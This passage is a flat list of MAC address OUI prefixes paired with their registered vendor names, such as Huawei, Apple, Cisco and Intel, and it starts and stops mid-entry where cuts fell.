Co., Ltd EC0273 Aruba, a Hewlett Packard Enterprise Company A04A5E Microsoft Corporation EC2E98 AzureWave Technology Inc. 38F3AB LCFC(HeFei) Electronics Technology co., ltd F46AD7 Microsoft Corporation 481F2D Shenzhen Jie Shi Lian Industrial Co.,LTD A8E81E ATW TECHNOLOGY, INC. F81A2B Google, Inc. CC88C7 Aruba, a Hewlett Packard Enterprise Company 84E986 Huawei Device Co., Ltd. AC1F0F Texas Instruments 74D285 Texas Instruments F885F9 Calix Inc. 78CFF9 Huawei Device Co., Ltd. 8C73A0 Fiberhome Telecommunication Technologies Co.,LTD F4A80D Wistron InfoComm(Kunshan)Co.,Ltd. 3CA8ED smart light technology 38B3F7 Huawei Device Co., Ltd. 1C87E3 TECNO MOBILE LIMITED 20B730 TeconGroup, Inc 14857F Intel Corporate 94E23C Intel Corporate 1CE6AD Huawei Device Co., Ltd. 509707 Xiamen Paperang Technology Co.,Ltd. 3CE36B Zhejiang Dahua Technology Co., Ltd. 983F66 Wuhan Funshion Online Technologies Co.,Ltd EC63D7 Intel Corporate 7C9F07 CIG SHANGHAI CO LTD 203B69 vivo Mobile Communication Co., Ltd. 5C1720 Huawei Device Co., Ltd. 605E4F Huawei Device Co., Ltd. 94A4F9 HUAWEI TECHNOLOGIES CO.,LTD 6C3491 HUAWEI TECHNOLOGIES CO.,LTD E84D74 HUAWEI TECHNOLOGIES CO.,LTD CC895E HUAWEI TECHNOLOGIES CO.,LTD 488899 Shenzhen SuperElectron Technology Co.,Ltd. DCB131 SHENZHEN HUARUIAN TECHNOLOGY CO.,LTD F0625A Realme Chongqing Mobile Telecommunications Corp.,Ltd. 843B10 LVSWITCHES INC. F01628 Technicolor (China) Technology Co., Ltd. B88DF1 Nanjing BigFish Semiconductor Co., Ltd. 6C4A74 AERODISK LLC 14EB08 HUAWEI TECHNOLOGIES CO.,LTD B01656 HUAWEI TECHNOLOGIES CO.,LTD 58FB96 Ruckus Wireless 285B0C Sichuan Jiuzhou Electronic Technology Co., Ltd. 1489CB HUAWEI TECHNOLOGIES CO.,LTD 6C2636 HUAWEI TECHNOLOGIES CO.,LTD 5856C2 HUAWEI TECHNOLOGIES CO.,LTD A03679 HUAWEI TECHNOLOGIES CO.,LTD B8D6F6 HUAWEI TECHNOLOGIES CO.,LTD 2C52AF HUAWEI TECHNOLOGIES CO.,LTD 48684A Intel Corporate AC2316 Mist Systems, Inc. 2C00AB ARRIS Group, Inc. 002470 AUROTECH ultrasound AS. 40DE17 Shenzhen Lanfeng Times Industrial Co.,Ltd. BCF171 Intel Corporate 84716A Huawei Device Co., Ltd. 488C63 Huawei Device Co., Ltd. 70DDEF Huawei Device Co., Ltd. 54A6DB Huawei Device Co., Ltd. 149877 Apple, Inc. 88665A Apple, Inc. B0E5F9 Apple, Inc. D4ECAB vivo Mobile Communication Co., Ltd. BC3ECB vivo Mobile Communication Co., Ltd. 08798C HUAWEI TECHNOLOGIES CO.,LTD 8CEA48 Samsung Electronics Co.,Ltd 005F67 TP-Link Corporation Limited BCF45F zte corporation A842A7 Jiangsu Huitong Group Co.,Ltd. 2CD26B FN-LINK TECHNOLOGY LIMITED DC9020 RURU TEK PRIVATE LIMITED 78D4F1 IEEE Registration Authority 1418C3 Intel Corporate 6055F9 Espressif Inc. 503DC6 Xiaomi Communications Co Ltd B0BD1B Dongguan Liesheng Electronic Co., Ltd. 54DBA2 Fibrain 548ABA Cisco Systems, Inc A062FB HISENSE VISUAL TECHNOLOGY CO.,LTD 9C6865 Fiberhome Telecommunication Technologies Co.,LTD 383D5B Fiberhome Telecommunication Technologies Co.,LTD 24EDFD Siemens Canada Limited 6CCDD6 NETGEAR 540764 Huawei Device Co., Ltd. DCD7A0 Huawei Device Co., Ltd. 3810F0 Aruba, a Hewlett Packard Enterprise Company F88F07 Samsung Electronics Co.,Ltd 001D1E KYUSHU TEN CO.,LTD 64A198 Huawei Device Co., Ltd. 5C9AA1 Huawei Device Co., Ltd. 2C0786 Huawei Device Co., Ltd. A86E4E Huawei Device Co., Ltd. 945F34 Renesas Electronics (Penang) Sdn. Bhd. 603CEE LG Electronics (Mobile Communications) 50C3A2 nFore Technology Co.,Ltd. 44AE25 Cisco Systems, Inc BCE712 Cisco Systems, Inc CCCC81 HUAWEI TECHNOLOGIES CO.,LTD 4089A8 WiredIQ, LLC 3C2093 GD Midea Air-Conditioning Equipment Co.,Ltd. E02967 HMD Global Oy 988B69 Shenzhen hylitech Co.,LTD 18146C Zhejiang Tmall Technology Co., Ltd. 30E283 Texas Instruments F8A73A Cisco Systems, Inc B8114B Cisco Systems, Inc 688975 nuoxc 34AFB3 Amazon Technologies Inc. 683F7D INGRAM MICRO SERVICES 804B50 Silicon Laboratories C0E3FB HUAWEI TECHNOLOGIES CO.,LTD 1CD1BA Fiberhome Telecommunication Technologies Co.,LTD A899DC i-TOP DESING TECHNOLOGY CO.,LTD 1C4C48 ITEL MOBILE LIMITED 20AC9C China Telecom Corporation Limited 28AD18 Hui Zhou Gaoshengda Technology Co.,LTD 24A487 Huawei Device Co., Ltd. C45A86 Huawei Device Co., Ltd. 109693 Amazon Technologies Inc. 782E56 China Mobile Group Device Co.,Ltd. 3024A9 HP Inc. BC62CE SHENZHEN NETIS TECHNOLOGY CO.,LTD 9409D3 shenzhen maxtopic technology co.,ltd 6420E0 T3 Technology Co., Ltd. 8411C2 IEEE Registration Authority 786A1F ARRIS Group, Inc. 2494CB ARRIS Group, Inc. 5CC0A0 HUAWEI TECHNOLOGIES CO.,LTD 04F352 HUAWEI TECHNOLOGIES CO.,LTD ECA1D1 HUAWEI TECHNOLOGIES CO.,LTD A46DA4 HUAWEI TECHNOLOGIES CO.,LTD 8C7A15 Ruckus Wireless 0C354F Nokia C4CB54 Fibocom Auto Inc. 2C4A11 Ciena Corporation 102D31 Shenzhen Americas Trading Company LLC E4F1D4 vivo Mobile Communication Co., Ltd. C40B31 Apple, Inc. AC6784 Google, Inc. A8B088 eero inc. EC7E91 ITEL MOBILE LIMITED 185BB3 Samsung Electronics Co.,Ltd 9C5FB0 Samsung Electronics Co.,Ltd E87F6B Samsung Electronics Co.,Ltd 90DE80 Shenzhen Century Xinyang Technology Co., Ltd 6C1414 BUJEON ELECTRONICS Co,.Ltd E0E1A9 Shenzhen Four Seas Global Link Network Technology Co., Ltd. 0017C9 Samsung Electronics Co.,Ltd 64A200 Xiaomi Communications Co Ltd 280FC5 Beijing Leadsec Technology Co., Ltd. 1CEC72 Allradio Co., Ltd B0ECDD HUAWEI TECHNOLOGIES CO.,LTD FCB69D Zhejiang Dahua Technology Co., Ltd. 94F2BB Valeo Vision Systems E4DC43 Huawei Device Co., Ltd. 2430F8 Huawei Device Co., Ltd. C43CEA BUFFALO.INC 7C4E09 Shenzhen Skyworth Wireless Technology Co.,Ltd 488B0A Cisco Systems, Inc 6C1ED7 vivo Mobile Communication Co., Ltd. F0AA0B Arra Networks/ Spectramesh 945641 Palo Alto Networks D4910F Amazon Technologies Inc. 80F5B5 Texas Instruments 1C3008 Hui Zhou Gaoshengda Technology Co.,LTD 98063A Home Control Singapore Pte Ltd B4BA12 China Mobile (Hangzhou) Information Technology Co.,Ltd. 5CF9FD Taicang T&W Electronics 3898E9 Huawei Device Co., Ltd. 48A516 Huawei Device Co., Ltd. F06426 Extreme Networks, Inc. 703A2D Shenzhen V-Link Technology CO., LTD. 1C45C2 Huizhou City Sunsin lntelligent Technology Co.,Ltd 84CC63 Huawei Device Co., Ltd. C07831 Huawei Device Co., Ltd. ECC302 HUMAX Co., Ltd. 28DE65 Aruba, a Hewlett Packard Enterprise Company B0A651 Cisco Systems, Inc 183672 Shaoxing ShunChuang Technology CO.,LTD C4FBAA HUAWEI TECHNOLOGIES CO.,LTD ACDCCA HUAWEI TECHNOLOGIES CO.,LTD B85FB0 HUAWEI TECHNOLOGIES CO.,LTD 98C97C Shenzhen iComm Semiconductor CO.,LTD E0E0C2 China Mobile Group Device Co.,Ltd. 04E795 HUAWEI TECHNOLOGIES CO.,LTD 689E0B Cisco Systems, Inc 004238 Intel Corporate 74F9CA Nintendo Co.,Ltd E475DC Arcadyan Corporation 58208A IEEE Registration Authority BCA5A9 Apple, Inc. 20E2A8 Apple, Inc. A0FBC5 Apple, Inc. 143FC3 SnapAV 209A7D Sagemcom Broadband SAS 50C68E Biwin Semiconductor (HK) Company Limted 007D60 Apple, Inc. C4DD57 Espressif Inc. 102779 Sadel S.p.A. 80CA4B SHENZHEN GONGJIN ELECTRONICS CO.,LTD A0D0DC Amazon Technologies Inc. 64F54E EM Microelectronic C41688 Huawei Device Co., Ltd. 64B0E8 Huawei Device Co., Ltd. 30A998 Huawei Device Co., Ltd. 00C343 E-T-A Circuit Breakers Ltd 00E406 HUAWEI TECHNOLOGIES CO.,LTD 44227C HUAWEI TECHNOLOGIES CO.,LTD CCB182 HUAWEI TECHNOLOGIES CO.,LTD 48902F LG Electronics (Mobile Communications) 4C2219 YUANFUDAO HK LIMTED B07D64 Intel Corporate 74427F AVM Audiovisuelles Marketing und Computersysteme GmbH 001C45 Chenbro Micom Co., Ltd. 0019DC ENENSYS Technologies 8C7086 Gesellschaft für Sonder-EDV-Anlagen mbH 1C28AF Aruba, a Hewlett Packard Enterprise Company E4246C Zhejiang Dahua Technology Co., Ltd. E8EB1B Microchip Technology Inc. 38BAB0 Broadcom C0619A IEEE Registration Authority 28C21F SAMSUNG ELECTRO-MECHANICS(THAILAND) 7061EE Sunwoda Electronic Co.,Ltd 68D6ED GooWi Wireless Technology Co., Limited 000083 TADPOLE TECHNOLOGY PLC 28B77C IEEE Registration Authority 400634 Huawei Device Co., Ltd. C42B44 Huawei Device Co., Ltd. F8A26D CANON INC. 840283 HUMAX Co., Ltd. 941700 Xiaomi Communications Co Ltd 00146A Cisco Systems, Inc 54F15F Sichuan AI-Link Technology Co., Ltd. E079C4 iRay Technology Company Limited AC9572 Jovision Technology Co., Ltd. 001753 nFore Technology Inc. B0A460 Intel Corporate AC9A96 Maxlinear, Inc 884067 infomark A8032A Espressif Inc. 40D25F ITEL MOBILE LIMITED D8EF42 Huawei Device Co., Ltd. 80CC12 Huawei Device Co., Ltd. 18AA0F Huawei Device Co., Ltd. 54D9C6 Huawei Device Co., Ltd. 308AF7 Huawei Device Co., Ltd. 64E7D8 Samsung Electronics Co.,Ltd 4843DD Amazon Technologies Inc. 5894A2 KETEK GmbH 001A57 Matrix Design Group, LLC 001CFC Sumitomo Electric Industries, Ltd 001636 Quanta Computer Inc. 909164 ChongQing Lavid Technology Co., Ltd. 1C3D2F HUAWEI TECHNOLOGIES CO.,LTD EC753E HUAWEI TECHNOLOGIES CO.,LTD 24A160 Espressif Inc. DCAEEB Ruckus Wireless 3C846A TP-LINK TECHNOLOGIES CO.,LTD. 84D81B TP-LINK TECHNOLOGIES CO.,LTD. 7C2ADB Xiaomi Communications Co Ltd 882949 Renesas Electronics (Penang) Sdn. Bhd. 083869 Hong Kong AMobile Intelligent Corp. Limited Taiwan Branch 2481C7 Huawei Device Co., Ltd. FC862A Huawei Device Co., Ltd. F864B8 zte corporation 145120 Huawei Device Co., Ltd. C0D193 Huawei Device Co., Ltd. 7804E3 Huawei Device Co., Ltd. A43B0E Huawei Device Co., Ltd. ECDB86 API-K 089BB9 Nokia Solutions and Networks GmbH & Co. KG D89ED4 Fiberhome Telecommunication Technologies Co.,LTD 001D67 AMEC 001A62 Data Robotics, Incorporated C06369 BINXIN TECHNOLOGY(ZHEJIANG) LTD. 1841FE Digital 14 8C0E60 Nanjing Juplink Intelligent Technologies Co., Ltd. 08B0A7 Truebeyond Co., Ltd E092A7 Feitian Technologies Co., Ltd B0761B HUAWEI TECHNOLOGIES CO.,LTD 84EAED Roku, Inc DC91BF Amazon Technologies Inc. 6CCE44 1MORE D84F37 Proxis, spol. s r.o. F860F0 Aruba, a Hewlett Packard Enterprise Company 8437D5 Samsung Electronics Co.,Ltd 3482C5 Samsung Electronics Co.,Ltd 18AB1D Samsung Electronics Co.,Ltd BCE92F HP Inc. 340A33 D-Link International 944444 LG Innotek 781100 Quantumsolution 940853 Liteon Technology Corporation B49E80 Sichuan Changhong Electric Ltd. A49340 Beijing Supvan Information Technology Co.,Ltd. F8E877 Harman/Becker Automotive Systems GmbH 98F621 Xiaomi Communications Co Ltd 7C6DF8 Apple, Inc. 50AD71 Tessolve Semiconductor Private Limited 5CA5BC eero inc. F0D7AF IEEE Registration Authority 7CA96B Syrotech Networks. Ltd. 98063C Samsung Electronics Co.,Ltd 1413FB HUAWEI TECHNOLOGIES CO.,LTD D0768F Calix Inc. C0395A Zhejiang Dahua Technology Co., Ltd. 2064CB GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 74A7EA Amazon Technologies Inc. 74AB93 Blink by Amazon E87F95 Apple, Inc. A09B12 China Mobile IOT Company Limited 00E22C China Mobile Group Device Co.,Ltd. 88C08B Apple, Inc. 4C7CD9 Apple, Inc. 0094EC Huawei Device Co., Ltd. 74452D Huawei Device Co., Ltd. 080342 Palo Alto Networks A45006 SHENZHEN HUACHUANG SHIDAI TECHNOLOGYCO.,LTD AC3C8E Flextronics Computing(Suzhou)Co.,Ltd. 406234 Telink Semiconductor (Shanghai) Co., Ltd. C87125 Johnson Outdoors Marine Electronics d/b/a Minnkota 80CFA2 Huawei Device Co., Ltd. FC3DA5 Arcadyan Corporation BC33AC Silicon Laboratories 140152 Samsung Electronics Co.,Ltd 94FBA7 IEEE Registration Authority EC6CB5 zte corporation C0B101 zte corporation DC1BA1 Intel Corporate 001329 VSST Co., LTD 7CF2DD Vence Corp F05501 Huawei Device Co., Ltd. 988E79 Qudelix, Inc. A86ABB Sagemcom Broadband SAS 2443E2 DASAN Network Solutions CCAB2C HUMAX Co., Ltd. 5859C2 Extreme Networks, Inc. 787D53 Extreme Networks, Inc. B82FCB CMS Electracom 4CFCAA Tesla,Inc. EC237B zte corporation D49CF4 Palo Alto Networks C42456 Palo Alto Networks 84D412 Palo Alto Networks 7C95B1 Extreme Networks, Inc. 6C6D09 Kyowa Electronics Co.,Ltd. C80739 NAKAYO Inc 540E2D vivo Mobile Communication Co., Ltd. 708F47 vivo Mobile Communication Co., Ltd. 90173F HUAWEI TECHNOLOGIES CO.,LTD 607ECD HUAWEI TECHNOLOGIES CO.,LTD 386B1C SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 001876 WowWee Ltd. E023FF Fortinet, Inc. 8C59DC ASR Microelectronics (Shanghai) Co., Ltd. 18828C Arcadyan Corporation D452EE SKY UK LIMITED AC1203 Intel Corporate 10CE45 Miromico AG BC4A56 Cisco Systems, Inc F8AF05 Huawei Device Co., Ltd. 94E9EE Huawei Device Co., Ltd. 64BC58 Intel Corporate 28E34E HUAWEI TECHNOLOGIES CO.,LTD 6C61F4 SFR 9CF029 Integrated Device Technology (Malaysia) Sdn. Bhd. 2856C1 Harman/Becker Automotive Systems GmbH 78B8D6 Zebra Technologies Inc. 402E71 Texas Instruments F490CB IEEE Registration Authority 185869 Sailer Electronic Co., Ltd BC2DEF Realme Chongqing Mobile Telecommunications Corp.,Ltd. 7881CE China Mobile Iot Limited company 445CE9 Samsung Electronics Co.,Ltd C01692 China Mobile Group Device Co.,Ltd. 005E0C HMD Global Oy B48107 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 706655 AzureWave Technology Inc. 98C8B8 vivo Mobile Communication Co., Ltd. B8D4E7 Aruba, a Hewlett Packard Enterprise Company BC0963 Apple, Inc. D84C90 Apple, Inc. 24D0DF Apple, Inc. 209EF7 Extreme Networks, Inc. 381730 Ulrich Lippert GmbH & Co KG BCFF21 Smart Code(shenzhen)Technology Co.,Ltd 6C4A85 Apple, Inc. 28F033 Apple, Inc. F08175 Sagemcom Broadband SAS 1C63BF SHENZHEN BROADTEL TELECOM CO.,LTD D8C561 CommFront Communications Pte Ltd 60D89C HMD Global Oy 688FC9 Zhuolian (Shenzhen) Communication Co., Ltd D84732 TP-LINK TECHNOLOGIES CO.,LTD. A043B0 Hangzhou BroadLink Technology Co.,Ltd F41C95 BEIJING YUNYI TIMES TECHNOLOGY CO,.LTD C858C0 Intel Corporate 4CB16C HUAWEI TECHNOLOGIES CO.,LTD 2864B0 Huawei Device Co., Ltd. 04F169 Huawei Device Co., Ltd. 5021EC Huawei Device Co., Ltd. AC3651 Jiangsu Hengtong Terahertz Technology Co., Ltd. 684A76 eero inc. 8C683A HUAWEI TECHNOLOGIES CO.,LTD B46E08 HUAWEI TECHNOLOGIES CO.,LTD 0C48C6 CELESTICA INC. A42985 Sichuan AI-Link Technology Co., Ltd. F82E8E Nanjing Kechen Electric Co., Ltd. B4C9B9 Sichuan AI-Link Technology Co., Ltd. F0463B Comcast Cable Corporation 9CA513 Samsung Electronics Co.,Ltd 4C6C13 IoT Company Solucoes Tecnologicas Ltda 0009F3 WELL Communication Corp. F85B3B ASKEY COMPUTER CORP C8FA84 Trusonus corp. A0687E ARRIS Group, Inc. A8705D ARRIS Group, Inc. 9C9789 1MORE C402E1 Khwahish Technologies Private Limited 786DEB GE Lighting 8C5AC1 Huawei Device Co., Ltd. A85AE0 Huawei Device Co., Ltd. A4B61E Huawei Device Co., Ltd. A885D7 Sangfor Technologies Inc. 444ADB Apple, Inc. 88E9A4 Hewlett Packard Enterprise 2863BD APTIV SERVICES US, LLC 309048 Apple, Inc. 307ECB SFR C803F5 Ruckus Wireless C8C465 HUAWEI TECHNOLOGIES CO.,LTD 1C4363 HUAWEI TECHNOLOGIES CO.,LTD C467D1 HUAWEI TECHNOLOGIES CO.,LTD 9424B8 GREE ELECTRIC APPLIANCES, INC. OF ZHUHAI CCF411 Google, Inc. 9C2DCF Shishi Tongyun Technology(Chengdu)Co.,Ltd. 0433C2 Intel Corporate C4FE5B GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 84F883 Luminar Technologies B44C3B Zhejiang Dahua Technology Co., Ltd. 94292F New H3C Technologies Co., Ltd D49AA0 VNPT TECHNOLOGY F80FF9 Google, Inc. 40A2DB Amazon Technologies Inc. C03937 GREE ELECTRIC APPLIANCES, INC. OF ZHUHAI 6CF049 GIGA-BYTE TECHNOLOGY CO.,LTD. FCAA14 GIGA-BYTE TECHNOLOGY CO.,LTD. 444687 Realme Chongqing MobileTelecommunications Corp Ltd 20F375 ARRIS Group, Inc. 84BB69 ARRIS Group, Inc. C0B47D Huawei Device Co., Ltd. F4A59D Huawei Device Co., Ltd. E82689 Aruba, a Hewlett Packard Enterprise Company A4B439 Cisco Systems, Inc A0B439 Cisco Systems, Inc 105FD4 Tendyron Corporation E0F442 Huawei Device Co., Ltd. F0C42F Huawei Device Co., Ltd. D4B709 zte corporation 38144E Fiberhome Telecommunication Technologies Co.,LTD E0CCF8 Xiaomi Communications Co Ltd E81B4B amnimo Inc. 843E79 Shenzhen Belon Technology CO.,LTD B81904 Nokia Shanghai Bell Co., Ltd. B4A5AC GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 1C784E China Mobile Iot Limited company AC675D Intel Corporate 84C5A6 Intel Corporate 5C80B6 Intel Corporate F8E4E3 Intel Corporate D8CF89 Beijing DoSee Science and Technology Co., Ltd. 04AAE1 BEIJING MICROVISION TECHNOLOGY CO.,LTD 44DC4E ITEL MOBILE LIMITED 7C210E Cisco Systems, Inc B4E8C9 XADA Technologies 48A5E7 Nintendo Co.,Ltd A01C8D HUAWEI TECHNOLOGIES CO.,LTD F4DEAF HUAWEI TECHNOLOGIES CO.,LTD 60123C HUAWEI TECHNOLOGIES CO.,LTD 88123D Suzhou Aquila Solutions Inc. 48210B PEGATRON CORPORATION 0068EB HP Inc. 7C310E Cisco Systems, Inc 6C24A6 vivo Mobile Communication Co., Ltd. 9C5F5A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 7CB37B Qingdao Intelligent&Precise Electronics Co.,Ltd. 382A19 Technica Engineering GmbH 74D654 GINT 484C86 Huawei Device Co., Ltd. 54F294 Huawei Device Co., Ltd. 245AB5 Samsung Electronics Co.,Ltd C0D2DD Samsung Electronics Co.,Ltd 942DDC Samsung Electronics Co.,Ltd F07807 Apple, Inc. 082CB6 Apple, Inc. F84E73 Apple, Inc. 3CCD36 Apple, Inc. B4265D Taicang T&W Electronics 44F971 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 18F9C4 BAE Systems 60ABD2 Bose Corporation A4C939 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 34D772 Xiamen Yudian Automation Technology Co., Ltd F4E5F2 HUAWEI TECHNOLOGIES CO.,LTD 541310 HUAWEI TECHNOLOGIES CO.,LTD 8CE5EF HUAWEI TECHNOLOGIES CO.,LTD B83A5A Aruba, a Hewlett Packard Enterprise Company F0EF86 Google, Inc. E4C0CC China Mobile Group Device Co.,Ltd. A0946A Shenzhen XGTEC Technology Co,.Ltd. 1C2AA3 Shenzhen HongRui Optical Technology Co., Ltd. 388E7A AUTOIT 5CB13E Sagemcom Broadband SAS E4AAEA Liteon Technology Corporation 4C710D Cisco Systems, Inc 4C710C Cisco Systems, Inc A4CD23 Shenzhenshi Xinzhongxin Co., Ltd E01F0A Xslent Energy Technologies. LLC C0DCDA Samsung Electronics Co.,Ltd 04B429 Samsung Electronics Co.,Ltd 48794D Samsung Electronics Co.,Ltd FCDB21 SAMSARA NETWORKS INC E447B3 zte corporation 9C31C3 SKY UK LIMITED E4671E SHEN ZHEN NUO XIN CHENG TECHNOLOGY co., Ltd. 682719 Microchip Technology Inc. 24C17A BEIJING IACTIVE NETWORK CO.,LTD 7C8AE1 COMPAL INFORMATION (KUNSHAN) CO., LTD. 3C86D1 vivo Mobile Communication Co., Ltd. 301B97 Lierda Science & Technology Group Co.,Ltd 74DA88 TP-LINK TECHNOLOGIES CO.,LTD. CC32E5 TP-LINK TECHNOLOGIES CO.,LTD. 1C3BF3 TP-LINK TECHNOLOGIES CO.,LTD. 2C00F7 XOS A0D86F ARGO AI, LLC 1459C3 Creative Chips GmbH 2CD2E3 Guangzhou Aoshi Electronic Co.,Ltd A445CD IoT Diagnostics 946269 ARRIS Group, Inc. A8C252 Huawei Device Co., Ltd. A04147 Huawei Device Co., Ltd. 1CCCD6 Xiaomi Communications Co Ltd 684AAE HUAWEI TECHNOLOGIES CO.,LTD 60D755 HUAWEI TECHNOLOGIES CO.,LTD 1CAECB HUAWEI TECHNOLOGIES CO.,LTD 4CF19E Groupe Atlantic 04ED33 Intel Corporate 7CC926 Wuhan GreeNet Information Service Co.,Ltd. 68070A TPVision Europe B.V 4CEBBD CHONGQING FUGUI ELECTRONICS CO.,LTD. 70879E Beken Corporation 044A6C HUAWEI TECHNOLOGIES CO.,LTD 38FB14 HUAWEI TECHNOLOGIES CO.,LTD F0E4A2 HUAWEI TECHNOLOGIES CO.,LTD B45062 EmBestor Technology Inc. 2036D7 Shanghai Reacheng Communication Technology Co.,Ltd 54E4A9 BHR Tech GmbH 208058 Ciena Corporation 5C75AF Fitbit, Inc. C863FC ARRIS Group, Inc. 94D505 Fiberhome Telecommunication Technologies Co.,LTD 7CB27D Intel Corporate 1063C8 Liteon Technology Corporation 7C5189 SG Wireless Limited 582059 Xiaomi Communications Co Ltd 90272B Algorab S.r.l. 4CBCB4 ABB SpA - DIN Rail 482759 Levven Electronics Ltd. 082697 Zyxel Communications Corporation 5CD135 Xtreme Power Systems 7869D4 Shenyang Vibrotech Instruments Inc. CCCCCC Silicon Laboratories D4ADBD Cisco Systems, Inc 2440AE NIIC Technology Co., Ltd. F40E01 Apple, Inc. 18A4A9 Vanu Inc. 80E82C Hewlett Packard AC7713 Honeywell Safety Products (Shanghai) Co.,Ltd 08849D Amazon Technologies Inc. 74E1B6 Apple, Inc. 24A52C HUAWEI TECHNOLOGIES CO.,LTD 1495CE Apple, Inc. 50DE06 Apple, Inc. CC660A Apple, Inc. FC1D43 Apple, Inc. 64CB9F TECNO MOBILE LIMITED 4CFBFE Sercomm Japan Corporation C0CBF1 Mobiwire Mobiles (NingBo) Co., LTD FC7D6C HYESUNG TECHWIN Co., Ltd 1CD5E2 Shenzhen YOUHUA Technology Co., Ltd 0024E9 Samsung Electronics Co.,Ltd E47E9A zte corporation 2C16BD IEEE Registration Authority 30A889 DECIMATOR DESIGN 68AB09 Nokia 5C5AC7 Cisco Systems, Inc B46077 Sichuan Changhong Electric Ltd. 00F620 Google, Inc. F43328 CIMCON Lighting Inc. 1CB796 HUAWEI TECHNOLOGIES CO.,LTD 3847BC HUAWEI TECHNOLOGIES CO.,LTD 549209 HUAWEI TECHNOLOGIES CO.,LTD 745909 HUAWEI TECHNOLOGIES CO.,LTD 7C942A HUAWEI TECHNOLOGIES CO.,LTD 683B78 Cisco Systems, Inc F4CE36 Nordic Semiconductor ASA 00EDB8 KYOCERA Corporation B4A2EB IEEE Registration Authority 5CA1E0 EmbedWay Technologies 2899C7 LINDSAY BROADBAND INC 54EC2F Ruckus Wireless BCA13A SES-imagotag 7CB59B TP-LINK TECHNOLOGIES CO.,LTD. 2C4F52 Cisco Systems, Inc 2823F5 China Mobile (Hangzhou) Information Technology Co., Ltd. F010AB China Mobile (Hangzhou) Information Technology Co., Ltd. B4DC09 Guangzhou Dawei Communication Co.,Ltd 98865D Nokia Shanghai Bell Co., Ltd. 68A03E HUAWEI TECHNOLOGIES CO.,LTD B8C385 HUAWEI TECHNOLOGIES CO.,LTD C8D69D Arab International Optronics 405BD8 CHONGQING FUGUI ELECTRONICS CO.,LTD. B891C9 Handreamnet C8A776 HUAWEI TECHNOLOGIES CO.,LTD A400E2 HUAWEI TECHNOLOGIES CO.,LTD B4C4FC Xiaomi Communications Co Ltd FCBD67 Arista Networks 9C99CD Voippartners C4C603 Cisco Systems, Inc 00257E NEW POS TECHNOLOGY LIMITED 4CE9E4 New H3C Technologies Co., Ltd C80D32 Holoplot GmbH ACDB48 ARRIS Group, Inc. 7445CE CRESYN 487746 Calix Inc. F8AE27 John Deere Electronic Solutions D05794 Sagemcom Broadband SAS 04D9F5 ASUSTek COMPUTER INC. C4F7D5 Cisco Systems, Inc 1C6499 Comtrend Corporation 88EF16 ARRIS Group, Inc. 8CA96F D&M Holdings Inc. 98B8BA LG Electronics (Mobile Communications) E002A5 ABB Robotics F42E7F Aruba, a Hewlett Packard Enterprise Company B4CC04 Piranti 143CC3 HUAWEI TECHNOLOGIES CO.,LTD A8E544 HUAWEI TECHNOLOGIES CO.,LTD 0CE99A ATLS ALTEC 4C11AE Espressif Inc. 8C89FA Zhejiang Hechuan Technology Co., Ltd. 4CBC48 Cisco Systems, Inc 48D875 China TransInfo Technology Co., Ltd 3050FD Skyworth Digital Technology(Shenzhen) Co.,Ltd 0040BC ALGORITHMICS LTD. 7CD661 Xiaomi Communications Co Ltd 50C4DD BUFFALO.INC D4789B Cisco Systems, Inc 483FE9 HUAWEI TECHNOLOGIES CO.,LTD 10DC4A Fiberhome Telecommunication Technologies Co.,LTD 004065 GTE SPACENET 1820D5 ARRIS Group, Inc. B0FD0B IEEE Registration Authority 1CBFCE Shenzhen Century Xinyang Technology Co., Ltd F83002 Texas Instruments A8A159 ASRock Incorporation ECADE0 D-Link International F0B968 ITEL MOBILE LIMITED 04E56E THUB Co., ltd. B8D526 Zyxel Communications Corporation 38D2CA Zhejiang Tmall Technology Co., Ltd. 109E3A Zhejiang Tmall Technology Co., Ltd. 78DA07 Zhejiang Tmall Technology Co., Ltd. A8BF3C HDV Phoelectron Technology Limited D4F527 SIEMENS AG 44A61E INGRAM MICRO SERVICES 904DC3 Flonidan A/S 000DF1 IONIX INC. 00077C Westermo Network Technologies AB 1C7F2C HUAWEI TECHNOLOGIES CO.,LTD 88BCC1 HUAWEI TECHNOLOGIES CO.,LTD 8C426D HUAWEI TECHNOLOGIES CO.,LTD 147BAC Nokia 5462E2 Apple, Inc. 149D99 Apple, Inc. B8B2F8 Apple, Inc. 98460A Apple, Inc. B85D0A Apple, Inc. 7C9A1D Apple, Inc. 103025 Apple, Inc. 202AC5 Petite-En 906D05 BXB ELECTRONICS CO., LTD D4BBC8 vivo Mobile Communication Co., Ltd. 489507 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 70ACD7 Shenzhen YOUHUA Technology Co., Ltd 445D5E SHENZHEN Coolkit Technology CO.,LTD 041EFA BISSELL Homecare, Inc. 647366 Shenzhen Siera Technology Ltd CCDC55 Dragonchip Limited A4C3F0 Intel Corporate 745BC5 IEEE Registration Authority 9440C9 Hewlett Packard Enterprise 28FFB2 Toshiba Corp. 1C60D2 Fiberhome Telecommunication Technologies Co.,LTD F4B5AA zte corporation E8ACAD zte corporation 0836C9 NETGEAR A041A7 NL Ministry of Defense 744D28 Routerboard.com A41162 Arlo Technology D85575 Samsung Electronics Co.,Ltd D411A3 Samsung Electronics Co.,Ltd 04BA8D Samsung Electronics Co.,Ltd E446DA Xiaomi Communications Co Ltd 1C12B0 Amazon Technologies Inc. 4CC8A1 Cisco Meraki 4CBC98 IEEE Registration Authority 58D9C3 Motorola Mobility LLC, a Lenovo Company 2C73A0 Cisco Systems, Inc 2CF432 Espressif Inc. E05A9F IEEE Registration Authority 8C5AF8 Beijing Xiaomi Electronics Co., Ltd. D45800 Fiberhome Telecommunication Technologies Co.,LTD 2C557C Shenzhen YOUHUA Technology Co., Ltd F4BCDA Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd 000915 CAS Corp. 90842B LEGO System A/S 00267E PARROT SA 8485E6 Guangdong Asano Technology CO.,Ltd. 3C8375 Microsoft Corporation 0017A0 RoboTech srl 78A7EB 1MORE 485D36 Verizon 20C047 Verizon 346B46 Sagemcom Broadband SAS 443E07 Electrolux E84C56 